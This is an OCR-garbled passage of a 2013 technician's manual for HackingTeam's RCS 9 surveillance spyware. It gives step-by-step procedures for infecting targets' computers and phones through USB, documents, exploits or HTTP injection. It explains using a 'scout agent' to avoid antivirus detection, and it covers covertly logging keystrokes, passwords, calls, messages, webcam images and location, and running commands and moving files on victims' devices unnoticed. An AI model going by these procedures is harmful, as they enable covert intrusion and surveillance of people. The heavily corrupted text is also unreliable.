RC5 9 - What the RC5 Console looks like II Momma: ?persllo'u nun-Mel-:51: Hal-15M lie: 5: . Ad: sap-rsz u-r. Area Description .ul nt-u- I- ul EEI ElTitle bar with command buttons: *1 Logout from RC5. Page refresh button. El Expand window button. l;l Shrink window button. 2 0 Return to homepage button 0 RC5 menu with functions enabled for the user. 3 Operation scroll bar. Descriptions are provided below: Icon Description a Back to higher level. a Show the operation page (Operations section). Show the target page. in Show the factory' page. 5' Show the agent page. a Show the operation page (Intelligence section). Show the entity page. Technician's Guide uer.1.5 RCSQ 2013 - pag. 15

RC5 9 -Ac?ons always available on the interface Area Description 4 Buttons to display all elements regardless of their group membership. Descriptions are proyided below: icon Description a Show all operations. Show all targets. 5? Show all agents. Show all entities. 5 Window toolbar. 5 Search buttons and box: Object Description ?31 Search box. Enter part of the name to display a list of elements that contain the entered letters. Display elements in a table. Display elements as icons. 7 Logged in user with possibility of changing the language and password. 3 Download area with ability to yiew progress during export or compiling. Files are downloaded to the desktop in RCS Download folder. 0 top bar: percent generation on seryer 0 bottom bar: percent download from seryer to RC5 Console. 9 Current date and time with possibility of changing the time zone. Actions always available on the interface Change interface language or password To change the interface language or password: Step Action 1 Click to display a dialog window with the user's data. 2 Change the language or password and click Saye to con?rm and exit. Technician's Guide yer.1.5 RCSQ 2013 - pag. 16

RCS 9 - Converting the RC5 Console date?time to the actual time zone Converting the RC5 Console date-time to the actual time zone To convert all dates-times to the actual time zone: Step Action 1 Click to display a dialog window with the current date-tim e: UTC time: Greenwich mean time (GMT) Local Time: date-time where the RC5 server is installed Console time: date-time of the console used and which can be converted. 2 Change the time zone and click Save to confirm and exit: all displayed dates-times are converted as requested. Table actions The RCS Console displays various data in tables. Tables let you: . sort data by column in increasingidecreasing order 0 filter data by column Action Description Sort by column Click on the column heading to sort that column in increasing or decreasing order. Event glam? vs. Sword?sh INSTAHCE Sword?sh EVIDENCE Filter a text Enter part of the text you are searching for: only elements that contain the entered text appear. 3 Info The example shows elements with descriptions like: 0 "myboss" "bossanova" Technician's Guide ver.1.5 RCSEJ 2013 - pag. 17

RC5 9 - Technician procedures Action Description Filter based on an Select an option: the elements that match the selected option appear. tion IE Acquired I?i Last Hours . Last Week From iTn Action User Filter based on several Select one or more options: the elements that match all selected options options appear. Elm?: I Untagged I Law I Medlum a High ll Critical Change the column Select the edge of the column and drag it. size Technician procedures Introducti on The Technician is in charge of infection rules to retrieve important information. Some typical procedures are described below with references to significant chapters. These are only simple indications. Skill and ability are essential to exploit RCS flexibility and adapt it to investigation needs Procedures Injection on HTTP connections Network Injector must be used for injections on HTTP connections: Technician's Guide ver.1.5 RCSQ 2013@ - pag. 18

RC5 9 - lnfec?ng a computer not connected to Internet Step Action 1 In the System, Network Injector section, create identification and injection rules for Network Injector Appliance and Tactical Network Injector. See "Managing the Network Injector? on page 6? NOTE: no agent installation is required. 2 When using Network Injector Appliance, the system applies the identi?cation rules to traffic data. (Since target devices are found, they are infected with the injection rules. Or they can be automatically or manually identi?ed and infected using Tactical Network Injector. See "Tactical Controll Center on page 84 . lnfecting a computer not connected to Internet To infect a computer not connected to Internet Step Action 1 Create a factory by disabling on the operation level, see "Operation page? on page 24 . Ur create a factor on the target level always without see "Target page? on page 28 2 Compile the factory selecting the installation vector suited to the device platform and installation method, then create the agent. See a factory? on page 35 . 3 Install the agent on the target device with the selected methods. See "List of installation vectors? on page 138 . 4 After the required amount of time, retrieve evidence produced on the target device. Import agent evidence and analyze it. See "Agent page" on page 41 . lnfecting a computer connected to Internet To infect a computer connected to Internet Tip: these steps are essential when you do not initially know which target activities to in? record or to avoid recording an excessive amount of data. Technician's Guide ver.1.5 RCSQ 20133 - pag. 19

RC5 9 - Keeping agent software updated Step Ac tian 1 Create a factory: the system automatically enables See "Operation page" on page 24 2 Compile the factory selecting the installation yector suited to the deyice platform and installation method, then create the agent. See afactory" on page 35 . 3 Install the agent on the target deyice with the selected methods. See "List of instaliation vectors" on page 138 . 4 The agent appears in the target page at first See "Target page" on page 28 5 Reset the agent using the basic or advanced con?guration. The agent applies the new con?guration at the next See "Basic factory or agent configuration" on page 50 See "Advancedfactory or agent configuration? on page 59 . Keeping agent software updated HackingTeam cyclically updates its software. To update installed agents: Step Ac tian 1 I In Operations section, Target update agents. See "Target page" on page 28 or I In Operations section, Target open an agent and update it. See gent page? on page 41 . Technician's Guide yer.1.5 RC3 9 20133 - pag. 20

RICE- - Operation and target Operation and target Presentation Introduction Managing operations sets the targets to be tapped. Content This section includes the following topics: What you should know about operations .22 What you should knowabouttargets Operation management Operation data .24 Operation page 24 Operation pagedata 25 TechniciansGuide uer.1.5 RES lit-1R1? HT - peg. 21

RC3 9 - Whatvou would know about operations What you should know about operations What is an operation An operation is an investigation to be conducted. An operation contains one or more targets meaning the physical individuals to be tapped. The Technician assigns one or more agents, desktop or mobile, to the target. Thus the agent can be installed on a computer or mobile phone. What you should know about targets What is a target A target is the physical person to be investigated. The Technician assigns one or more agents, desktop or mobile, to the target. Thus the agent can be installed on a computer or mobile phone. Operation management To onoge - Dpe rations scction operations: Purpose This function lets you: a. view and manage targets linked to an operation NOTE: the function is onlv enabled if the user has Operation management authorization. What the function looks like This is what the page looks like: Technician's Guide ver.1.5 RC8 9 20134323 - pag. 22

RC5 9 -To learn more .1 sr-wl- 1 Urn-mans l'nlx'm 2:11:31: doc-tn a l?l Humbug El 4' I at a . Tm'n I1r nah a Ilm Elan!" I'm. In". - aw J5 urn-In: I.- .l Area Description 1 RC5 menu. 2 Scroll bar. 3 Window toolbar. 4 List of created operations: Open operation. If targets were set and agents correctlv installed, collected evidence is received. a Closed operation. All targets are closed and agents uninstalled. All its targets and evidence can still be viewed. 5 Selected operation data. 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions? on page 14 . For a description of the data in this window see "Operation data? on the facing page . For more information on operations see "What you should know about operations? on previous page. Technician's Guide ver.1.5 RC8 9 20131133 - pag. 23

RC5 9 - 1 ul'iewing operation targets 1'll'iewing operation targets To view operation targets: Step Action 1 Double-click an operation: the target management page opens. See "Operation page" below Operation data Selected operation data is described below: Data Description Name Operation name. Description User's description Contact Descriptive field used to define, for example, the name of a contact person (Judge, Attorney, etc.). status Operation status and close command: OPEN: the operation is open. If targets were set and agents correctly installed, the RC5 receives the collected evidence. CLOSED: the operation is closed and can not be re-openecl. Agents no longer send data but evidence already received can still be viewed. Groups Groups that can see the operation. Operation page To view on operation: a Operation section, double-click an operation Purpose This function lets you: . manage factories which, once compiled, become agents to be installed on devicessee "Advoncedfoctory or agent configuration? on page 59 1ll?ll'hat the function looks like This is what the page looks like: Technician's Guide ver.1.5 RC3 9 201313 - pag. 24

RC5 9 -To learn more .1 math-w- Elli?l ., .. {r ppm-nun: I mu. ..: cm .13: 1 .u rx u::nlm l- Homesun-urn .-- nf-vu- :npmv-y lit-.rlb- I'm. In". dunnlun 'Iw snag..- J: mer [Mina-SJ! 2 Area Description 1 RC5 menu. 2 Scroll bar. 3 Window toolloar. Descriptions are provided below: icon Function k. Create a factory. I NOTE: the function is only enabled if the user has Factoryr creation authorization? factory can also be created on the target level, see "Operation page" on previous page . 4 Target list: 9 Open target a Closed target 5 Selected target data. 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions" on page 14 . Technician's Guide ver.1.5 RCSQ 20133:) - pag. 25

RC5 9 - Creating a factory For more information on operations see "What you shouid know about operations" on page 22 . For more information on factories see "What you shouid know about factories and agents" on page 33 . For a description of the data in this window see "Operation page data? beiow . To quickly manage operation datasee "Wizards in the homepage" on page 13 . Creating a factory To create a factory: Step Action 1 0 Click New Factory: data entry fields appear. . Enter the name and description and in Type select the device type. 2 Click Save: the new factory with the selected name appears in the main work area. Operation page data Selected target data is described below: Data Description Name Target name. Descriptign User's description status Defines the target's status: 9 Open. If the Technician correctly installs agents, RCS receiyes the collected eyidence. Closed, it can no longer be opened. Technician's Guide yer.1.5 RCSQ 20133:) - pag. 26

Targets resentatio Introduction A target is a physical person to be monitored. Several agents can be used, one for each device owned by the target. Content This section includes the following topics: Targetpage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ?28 Target page data -31 What you should know about factories and agents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .33 Compiling a factory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 35 uer.1.5 SEP-lula - Rub C?i - 2CI13EI - pag. 2?

RC5 9 - Target page Target page To open a target Operations section, double-click an operation, double-click a target Purpose This function lets vou: . manage factories which, when compiled, become agents to be installed on the target device. . open a factorv for basic configuration (see "Basic factory or agent configuration" on page 50) or advanced configuration (see dvancedfactory or agent configuration" on page 59 .- import target evidence . open an installed agent . update agent software What the function looks like This is what the page looks like: .- Inf-?ll nun-am '3 ?aunt-.1? a . . .4. aux--.. -. 1 El ..- Ialall': pox. .- -: Ctr-.1 . I'll" in "rum 11-11 The LU km 31.1: mun. .DIPEI: [Jill EHJIICH ram.th u- Dino.- harm a - - L- In Area Description 1 RES menu. Technician's Guide ver.1.5 RC3 9 201313} - pag. 23

RC5 9 - What the function looks like Area Description 2 Scroll bar. 3 Window toolbar. Descriptions are provided below: 0 ?mm. their data. key displays elements in a list with icon Function k. Create a factory. .. NOTE: the function is only enabled if the user has Factory creation authorization. A factory can also be created on the operation level, see "Operation page? on page 24 . Editing a factory or agent Deleting a factory or agent Closing the agent or factory. Moving the factory or agent to a new target. Update all agents' software to the last version received from HackingTeam support service. CAUTION: the update does not update the 1 con?guration that is transmitted to the agent at the neth Mia-33? 0 IMPORTANT: for Android, root privileges must be obtained to update the agent.$ee "What you should know about Android? on page 139 . Import target evidence physically collected on the 4' device. NOTE: the function is only enabled if the user has Import evidence authorization. Technician's Guide ver.1.5 20133:] - pag. 29

RC5 9 -To learn more Area Description 4 Iconsilist of created factories and installed agents. El agent in demo mode. scout agent awaiting verification. 5 Selected factory or agent data. 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions? on page 14 . For a description of the data in this window see "Target page data? on the facing page . For more information on targets see "What you shouid know about factories and agents" on page 33 To quickly manage target data: see "Wizards in the homepage" on page 13 . Creating a factory To create a factory: Step Action 1 0 Click New Factory: data entry fields appear. 0 Enter the name and description and in Type select the device type. 2 Click Save: the new factory with the selected name appears in the main work area. Closing a factory or agent To close a factory or agent: Step Action 1 Select a factory or agent and click Close. 2 Confirm close. 1 (HURON: ciosing an agent is irreversibie and the agent is uninstaiied at the in next Ciosing a factory makes it inaccessibie. Active agents remain accessibie whiie agents that have not been at ieast once before the factory is ciosed' be aninstaiied. Technician's Guide ver.1.5 RCSQ 2013 - pag. 30

RC5 9 - Deleting a factory:r or agent Deleting a factorvr or agent To delete a factory or agent: Step Action 1 Select a factory or agent and click Delete. Confirm the action: logs, settings and evidence are deleted. 1: CA UT this operation is irreversibie. I Importing target evidence To import evidence: Step Action 1 Click Import Evidence: the import window opens. Click Select Directoryr and select the folder where the offline.ini ?le is saved. 2 Click Import: evidence is saved in the database and is available to be viewed by Target page data To viewpo'ge data: . Operations section, double?click an operation, double?click a target, click Icon view or Table view Page elements can be viewed as icons or a table. Icon view Icons are described below: Data Description Desktop and mobile tvpe factory in Open status. Desktop agent types, in Open status, for operating systems: 4. OS In Windows Technician's Guide ver.1.5 RCSQ 20136:) - pag. 31

RC5 9 - Table 1luriew Doto Description Mobile agent types, in Open status, for operating systems: Android, BlackBerry, bian Windows Mobile NOTE: icons are light grey for CLOSED factories and agents. This is the icon for a mobile agent for Android in Closed status:D. 0 NOTE: icons are light grey for agents. This is the icon for a mobile agent for Android in Closed status: . NOTE: the scout agent displays a compass next to the device icon. This icon is a Windows desktop scout agent . Table View Data is described below: Doto Description Name Factory or agent name. Description Factory or agent description Status Open: an open factory can be compiled to create agents. An open agent can be installed, is running and records eyidence. Closed: a closed factory or agent cannot be reopened. Data in RC5 can still be viewed. Type Desktop or mobile type. Platform (agent only) Operating system on which the agent is installed. Version (agent only) Agent version. A new version is created when a new configuration is created. Last (agent only) Date and time of the last agent Technician's Guide yer.1.5 RCSQ 2013 - pag. 32

RC5 9 - What 1vou should know about factories and agents Data Description ldent (agent onlv) Univocal agent identi?cation. Instance (agent onlv) Univocal identification of the device where the agent is installed. What you should know about factories and agents Infection methods A device can be infected via: in physical infection: the device is infected by the execution of a file transmitted using USB memories, CD5 or documents. Evidence can be collected phvsicallv or via Internet as soon as the device connects. a! remote infection: the device is infected bv the execution of a file transferred via Internet connection or made available in a Web resource. Evidence can be collected phvsicallv or via Internet as soon as the device connects. Remote infection can be enhanced using Net- work Injector. Infection strategyr components Components needed for correct infection include: 1: Factory: agent model. i Installation vectors: infection channels. 0 Agent: the software to be installed on the target device. in Target and operation: defined when investigations are opened by the System Admin- istrator. Refer to the svstem Administrator IvIanuaI. Evidence: the tvpes of recordings to be collected Factories The factor]; is a model to be used to create agents to be installed. The icon varies according to the tvpe of device intended for the agent: in El: factorv for desktop agent i :factorv for mobile agent The following must be set in the factorv: 0 data to be acquired (basic configuration) or modules to be dvnamicallv activated {advanced configuration) at installation vectors CD, exploit, Network Injector) Technician's Guide ver.1.5 RCSEI 20135:) - pag. 33

RC5 9 - How to create factories Tip: a configuration can be saved as a template to load it the next time you create a i similar agent. E. Tip: a factory can be used to create several agents: for exam pl e, to be installed via different installation vectors two computers with different operating system How to create factories Factories are templates that can be created on two different operation-target-agent hierarchical levels: . on the operation ievel: the factorv, after installation and first auto- maticallv creates an agent and target for each device . on the target ievel: the factory, after installation and first autom aticallv creates an agent for that target The operation ievei mode ensure that collected evidence is assigned separatelv. In fact, it creates as manv agents as there are devices. Later, if two or more devices belong to the same target, the agent can be moved to the right target. The target ievei mode, if incorrectlv used, may create a factorv which is used to create several agents. Installation vectors Installation vectors are selected when compiling and de?ne the installation method, physical or remote, for an agent. When compiling, available installation vectors may vary according to the device's operating system. Several installation vectors can be used for the same agent. NOTE: injection rules are used for injection on HTTP connections.$ee "Managing the Network injector? on page 6? Agents An agent is the result of compiling a factorv with one or more installation vectors. An agent is ready to be installed on a device. Basic con?guration defines the type of data to be acquired while advanced configuration lets you dvnamicallv and independentlv activate or deactivate modules. For the types of modules available in basic and advanced configurations see "Module list" on page 122 For more information on agents see "What you should know about agents? on page 39 . Data acquisition modules Modules trigger some activities on the target device, mainlv data acquisition. The; are enabled and set in the basic configuration (onlv som e) or in advanced configuration. Available module tvpes also depend on the device type. Technician's Guide ver.1.5 RC3 9 201313 - pag. 34

RC5 9 - Compiling a factoryr For the complete listsee "Module list" on page 122 . Com piling a factory To compile afactory: a Operations section, double-click an operation, double-click a target, double-click a factorv, click Build Operations section, double-click an operation, double-clicka target, double-click a factorv, click?dvanced Config, Build Purpose This function lets vou create one or more agents {for production use or to be tested in demo) depending on the chosen installation vectors and target platforms. NOTE: for a detailed description of each installation vector see "List of installation vectors" on page 138 NOTE: the function is only enabled if the user has Installation vector creation authorization. Next steps Creating an agent implies the subsequent installation on a target device. 1What the function looks like This is how the page is displayed for a desktop agent: Technician's Guide ver.1.5 RC3 9 20133 - pag. 35

RC5 9 - To learn more Build an Agent from 3 Fa dory is ill ?r'ou can provide an already exsting application and itwill be melted Il?e ?her I?ll! t're agent is instelled as well. ?ll??ux Require Administrative Priv'lege Whentne acen: Ina SFEtern reqcea?we higherpossihle privileges gm U3 mama-Mn Application to he used as dropper: arm-5g" h-El?rrlne Instalarlun rhExplui. it: Nelvrorir Inje :t on IE Demo Lilo-tie Area Description 1 Installation vector and platform search box. 2 Vector and platform tree view. 3 Compiling settings area for the chosen vector. To learn more For interface element descriptions See "Shared interface elements and actions" on page 14 . For more information on factories see "What you should lmorv about factories and agents" on page 33 . For a detailed description of each installation vector see "List of installation vectors" on page 133 Creating an agent To create an agent: Step Action 1 Select one or more installation vectors and set the options. 2 Click Create: a ZIP or ISO file is created and dovvnloaded in the RC5 Dovvnload folder, ready to be installed on the device. Technician's Guide ver.1.5 RC3 9 20133 - pag. 36

RC5 9 - Creating an agent to he tested in demo mode Creating an agent to be tested in demo mode IM use this option for tests on internal devices. Agents in demo mode are not invisible and RC5 installation is not hidden. To create an agent for test purposes: Step Action 1 Select one or more installation vectors and set the options. 2 Select the Demo combo box. 3 Click Create; the agent installed on the device will show its presence with audio signals and on screen messages. Technician's Guide ver.1.5 RC3 9 20133 - pag. 3?

Agents resentatio Introduction Agents acquire data from the device on which they are installed and send it to the RC5 Collectors. Their configuration and software can be updated and they can transfer files unnoticed to the target. Content This section includes the following topics: What you should know about agents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 39 Agent page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .41 Agent configuration log data -43 Agent event log data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44 Agent log data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44 Command page -44 Transferring files toffrom a target . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45 uer.1.5 SEP-ECI13 - RES - 2CI13EI - peg. 38

RC5 9 - What should know about agents What you should know about agents Agent installation The agent can be exposed and identified if installed in environments with antivirus or in environments managed by expert technicians. To prevent this from happening, a substitute, the scout agent, is sent at installation to infect the target device and check the environment. Once installed, the scout agent appears in the target page after the first Its icon, similar to the agent one, indicates the platform where it is installed. For example: i scout agent installed on a Windows device in scout agent installed on a Blackberry device Evidence acquisition for installation environment analysis After installation is completed, the scout agent acquires evidence: 1: Screenshot type to help identify the target device . Device type to help understand whether the environment to be infected is ok or whether there are applications that could compromise agent integritv. IMPORTANT: Screenshot tvpe evidence is onlvr collected if the module is enabled in the configuration. If necessary, remember to enable it before sending the agent. Installation environment analysis After the scout agent acquires evidence, it must be checked to decide whether the installation environment is safe for the agent. If the environment is safe, the agent can be updated,- the scout agent is replaced by the agent. If the environment is not safe, the scout agent must be closed. Updating the scout agent Updating the scout agent installs the agent and the scout agent icon is replaced by the agent icon in the target page. It lEl: agent installed on a Windows device E3 . agent installed on a BlackBerrv device Technician's Guide ver.1.5 RCSQ 20135:) - pag. 39

RC5 9 - Agent Agent An agent will perform only if: . is enabled in the basic configuration 1- a type action was added to the advanced configuration. Offline and online agents An agent behaves differently according to the Internet connection availability: If the inter- net con- nection not avail- if the agent has modules enabled, it starts to record data in the device. able available if ?rst has been run on the agent, you can: 1. change settings, for example, as recording requests become more specific for that device. Resetting an agent does not change factory settings 1- update its software, . transfer files to and from the device, . analyze sent evidence E. Tip: start creating an agent and only enable and the device module. Then, once installed, and upon receiving the first gradually enable the other modules, according to the device capabilities and the type of evidence you want to collect. Temporarily disabling an agent Agent activities can be temporarily suspended without uninstalling the agent by simply disabling all the modules and leaving only active. Agent testing To test a configuration before production use, create an agent in Demo mode (see "Compiling a factory" on page 35 The agent is created in demo mode, behaving according to the given configuration, with the sole difference that it clearly signals its presence on the device (with audio, led and screen messages). Signaling permits easy identi?cation of an infected device used for testing. Technician's Guide ver.1.5 RC3 9 2013? - pag. 4U

RC5 9 - Agent con?guration NOTE: in case evidence is not received from an agent in demo mode, this mav be due to a server settings error or impossibility of reaching the address of the set Collector due to network settings problems). Agent configuration agent con?guration (basic or advanced) can be repeatedlv edited. When saved, a copy of the configuration is created and saved in the configuration log. At the next the agent will receive the new configuration (Sent time) and communicate successful installation (Activated). From that point on, any changes can onlv be made lav saving a new configuration. NOTE: If Sent time and Activated are null, the current settings can still be edited. For a description of agent configuration log data see gent configuration iog data? on page 43 . Agent page To manage It Operations section, double-click an operation, double-clicka target, double-click an agent agents: Purpose This function lets vou: .- check the agent configuration log and view details for each configuration. . transfer files toffrom the target device . importfexport agent evidence .- replace the scout agent with an agent and update the agent's software . displav commands run by the agent . display the IP addresses used by the agent to contact the Collector What the function looks like This is what the page looks like: Technician's Guide ver.1.5 RC3 9 201313 - pag. 41

RC5 9 - What the function looks like .1 sr-m man .. 9 Dnumlons ism "on: l- ??zmc'h:mma- up .--.. I .l -.. - .rlb- . a? 1 a a. um.- m. .WH. Jam- m-vw- ?h rAH'?h'l I [5 .m nun.- . 'Nlln 2 aria-I: .- hum rM-uu-LH 3- UH him Area Description 1 RC5 menu. 2 Scroll bar. 3 Window toolbar. Descriptions are provided below: icon Description Send the agent to the scout agent or update the agent software with the last version received from the HackingTeam. CAUTION: the update does not update the - con?guration that is transmitted to the agent at the neth 0 IMPORTANT: for Android, root privileges must be obtained to update the agent.$ee "What you should know about Android" on page 139 . Delete evidence on the device not yet transmitted to RCS. Parameters: in Date before: delete evidence saved before the set date. 0 Size bigger than: delete evidence larger than the set size. Technician's Guide ver.1.5 RCSQ 2013 - pag. 42

RC5 9 -To learn more Area Description 4 Possible actions on the agent. Descriptions are provided below: icon Description if i a a Show the agent settings log, allowing the existent settings to be edited and saved as new. See "Agent configuration iog data" below . Show the agent event log (info). See "Agent event iog data? on the facing page Show the results of commands run on the device using Execute actions. See "Command page? on the facing page . Show the agent log. See "Agent iog data" on the facing page . Open the function to upload or download files from the target device. See "Transferring fiies to/from a target? on page 46 5 Agent details. 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface eiements and actions" on page 14 . For more information on agents see "What you shouid know about agents? on page 39 . Agent configuration log data Descriptions are provided below: Fieid Description Description User's description of the settings. User Name of the user who created the configuration. saved Date settings were saved. sent time Date settings were sent via WARNING: if this value is null, the agent has not yet received the i configuration. Activated New agent configuration installation date. Technician's Guide ver.1.5 RC8 9 2013@ - pag. 43

RES - rltgent event log data Agent event log data Descriptions are provided below: Field Description Acquired Date?time of the event acquired on the device. It can be filtered. Last 24 hours is set by default. Received Date?time of the event logged in RC5. It can be filtered. Last 24 hours is set bv default. content Status information sent by the agent. Agent log data Descriptions are provided below: Field Description Acquired date?time. It can be filtered. Last 24 hours is set by default. IP IP address used for Address Site vvhere connection was established. Command page To manage - Operations section, double click an operation, double clicka target. double click an agent. command results: double click Commands urpose This function lets vou: . check the results of commands run with the Execute action set on the agent . check executable file results run during file transfer toffrom the agent . run one or more command on an agent What the function looks like This is what the page looks like: ver.1.5 RES 2013b? HT S.r.l. - pag. 44

RC5 9 - What the function looks like E's-m "w ?vv- Donated: Zia-sun: Ema?-uTr-was nus-ma Em"! mm n: 'Iu?ih I 1 - 'wwr fr. r?il?J?" 53"- H1 52' x23-? 1f 17 1 Area Description 1 RC5 menu. 2 Scroll bar. 3 Window toolbar. Descriptions are provided below: Icon Description Export the selected - command toa .txt ?le. Show selected command details. 0 Open a window to enter one or more command strings. All commands are sent to the agent at the next and the results are displayed at the next receipt. 0 NOTE: the function is only enabled if the user had Command execution on agents authorization. Technician's Guide yer.1.5 RC8 9 20133:] - pag. 45

RC5 9 - To learn more Area Description 5 Command list based on set ?lters. 5 RES status bar. To learn more For interface element descriptions See "Shared interface elements and actions" on page 14 . Transferring files to/from a target To tronsferfiies a Operations section, double-click an operation, double-click a target, double-click an agent! toffrom the agent: double-click File Transfer Purpose Uploading and downloading files on the device where the agent is installed. What the function looks like This is what the file transfer toifrom target function looks like: -I I'Iww in Cum-alith Della.- r4a "All. Hull: ?3 alum-u I- Ham-I - E'LrTI-nln l- l- a 1 '3 e- wl.llu.ul .I . I lul - I.- tan went-y 1-.1 LII Area Description 1 RES menu. 2 Operation scroll bar. Technician's Guide 1..rer.1.5 RC3 9 20133 - pag. 46

RC5 9 - What the function looks like Area Description 3 Window toolbar. Descriptions are provided below: icon Description 6 Upload a file to the device, in the folder where the agent is installed. Each successful upload is logged with the date- time and file name. 0 NOTE: the function is only enabled if the user had Upload files to agent authorization. Load an executable file in the device - folder where the agent is installed and run it (using Execute). Execution results appear in the Commands page. See "Command page? on page 44 . Each successful upload is logged with the date-time and ?le name. I i? IMPORTANT: this function can be inhibited if the user does not have the relevant permissions or if not permitted by the user Hcense. Export upload log. up Delete the selected upload Anv deleted command results are saved. 4 Upload log, with toolbar. 5 Window toolbar. Descriptions are provided below: icon Description 0 Download a file from the device. The path and file name must be indicated. Each successful download is logged with the file name complete with path. The file is saved in RC5 Download folder on the desktop. Delete the selected file from the RC5 - . Download folder. Technician's Guide ver.1.5 RCSQ 2013 - pag. 47

RC5 9 - To learn more Area Description 5 Download log, with toolbar. 7 RES status bar. To learn more For interface element descriptions See "Shared interface elements and actions" on page 14 . For a description of agent data see "Agent page" on page 41 . Technician's Guide 1urer.1.5 RC3 9 20133 - peg. 48

Factory and agent: basic configuration resentatio Introduction The basic configuration lets you add data acquisition and simple command execution modules that do not require complezu: settings. Content This section includes the following topics: What you should know about basic configuration Basic factory or agent configuration _.50 Basic configuration data Technician uer,1.5 - Riff} - - pag. 49

RC5 9 - What you should know about basic con?guration What you should know about basic configuration Basic configuration The basic factorylagent con?guration let you enable and quickly set evidence acquisition. Basic configuration does not include the acquisition of some types of evidence nor detailed acquisition method options. Default basic configuration: System information acquisition when the device is turned on (cannot be disabled] . A module to run between the agent and RC5 at a certain interval. For the list of module types available in the basic configuration see "Basic configuration data" on page 53 . when returning from advanced configuration to basic configuration, the i- advanced configuration will be lost and the default basic configuration will be restored. Exporting and importing configuration settings Base or advanced configuration settings are exportedfimported to reuse the settings on other RCS systems. The base or advanced configuration settings are exported in a .json ?le that can be transferred to another system and imported when creating an agent. Saving the configuration settings as a template Base or advanced configurations settings are saved as a template to have other users on the same RCS system reuse the configuration. The base or advanced configuration settings are saved as a template in the database, accompanied by a description and the name of the user. When creating another target, another user can load it and thus it becomes the configuration for that agent. IMPORTANT: base and advanced configuration templates are saved separately in the database. Base configuration templates thus appear when creating an agent with a base configuration, advanced configuration templates appear when creating an agent with an advanced configuration. Basic factory or agent configuration To setfacton'es and - Dperationssection, double-click an operation, double-click a target, double-clicka factory agents: Dperationssection, double-click an operation, double-click a target, double-click an agent Purpose This function lets you: Technician's Guide ver.1.5 RC3 9 20134333 - pag. 50

RC5 9 - Next steps . set the factoryfagent con?guration indicating whether online is required and the data to be acquired . open the factory compiling function (see "Compiling afactory" on page 35 . . open the advanced configuration function (see "Advancedfactory or agent configuration? on page 59 NOTE: the function is only enabled if the user has Agent configuration authorization. Next steps After setting a factory configuration, it must be compiled to obtain an agent. After editing the agent configuration, simply save it. If the agent is online, the new configuration will be applied at the next Otherwise, physical installation is required. 1ll?lihat the function looks like This is what the page looks like: .1 - A (toe-?mm 4 -.-. 5. I- G- .-.-- Lula. Inf-ruin?: ikypc. 1.1m:- calendar m.i .sm1s.ehu+ c'r rum ?la-Inth Ill Ill-ups. I I an. I I.- J..l .I Dr. ne 51-: manor :Irc'w.I .: .chinn-Mn: ?ti-HF I331: I Area Description 1 RES menu. 2 Technician's Guide yer.1.5 RC3 9 20133 - pag. 51

RC5 9 -To learn more Area Description 3 Window toolbar. Descriptions are provided below: icon Description a: II no. Compile the configuration into one or more agents to be installed, based on selected installation vectors. See "Compiling afactory" on page 35 Save the configuration: the agent configuration is logged and sent to the agent at the next See "Agent configuration log data? on page 43 Export the configuration to a .json file. Import the con?guration from a .json ?le. Load the basic configuration template or save the current configuration as a template. See "What you should ltnow about basic configuration on page 50. Open the advanced configuration window. See "Advanced factory or agent configuration on page 59 . when returning from advanced 1 configuration to basic configuration, the advanced configuration will be lost and the basic configuration will be restored. 4 List of collectable evidence and relevant activation status. NOTE: the module list varies according to device TYPE- 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions? on page 14 . For more information on the basic con?gurationsee "What you should ltnow about basic configuration? on page 50. For a description of the data in this window see "Basic configuration data? on the facing page . Technician's Guide ver.1.5 RC8 9 20131133 - pag. 52

RC5 9 - Setting a factoryr or agent con?guration For the list of modules available in the two configurations see "Moduie fist" on page 12.? Setting a 'factorvr or agent con?guration To activate or deactivate collectable evidence: Step Action 1 3 Continu if you are Click DFF for the evidence to be acquired: the button turns to UN and con- ?guration options, where available, may be set. In Dnline leave DN if the target device can access the Inter- net. This lets you graduallv set options. Leave DFF if the target device cannot access the Internet or if vou want to manuallv acquire evidence from the tar- get. Click Save to save the current configuration. differentlv: a 'iactorvr an age click Build to compile it and obtain the agents for the different platforms. See factory" on page 35 . nt agent settings are autom aticallv updated at the next Basic configuration data The types of collectable evidence that can be enabled in basic factory or agent configuration are listed below. Recording Description Calls Record calls. Messages Record messages. Accessed files Screen sh ots Pod?on (desktop onlv) Record documents or images opened by the target. Document, Images: file types. Record windows opened on the target displav. Grab a screenshot everv: image acquisition interval. Log the target's geographic position. Save target position every: position acquisition interval. Technician's Guide ver.1.5 RC3 9 20133) - pag. 53

RES - Basic con?guration data Recording Description Contacts 8? Record contacts a nd calendar. Calendar Visited websites Kevlog Kevlog, Mouse 81. Password Camera Unline Record visited website URL addresses. {mobile onlv} Log kev strokes. {desktop onlvl Log kev strokes, passwords saved on the svstem and mouse clicks. Record webcam images. Grab a shot every: image acquisition interval. acquisition repetitions. Enabled bv default. If enabled, the agent contacts the server to send data and receives new configurations, updates, and so on. Every: interval minute on: Anonvmizer or Collector name or IP address. The name or IP address can be ma nuallv entered. ver.1.5 RES

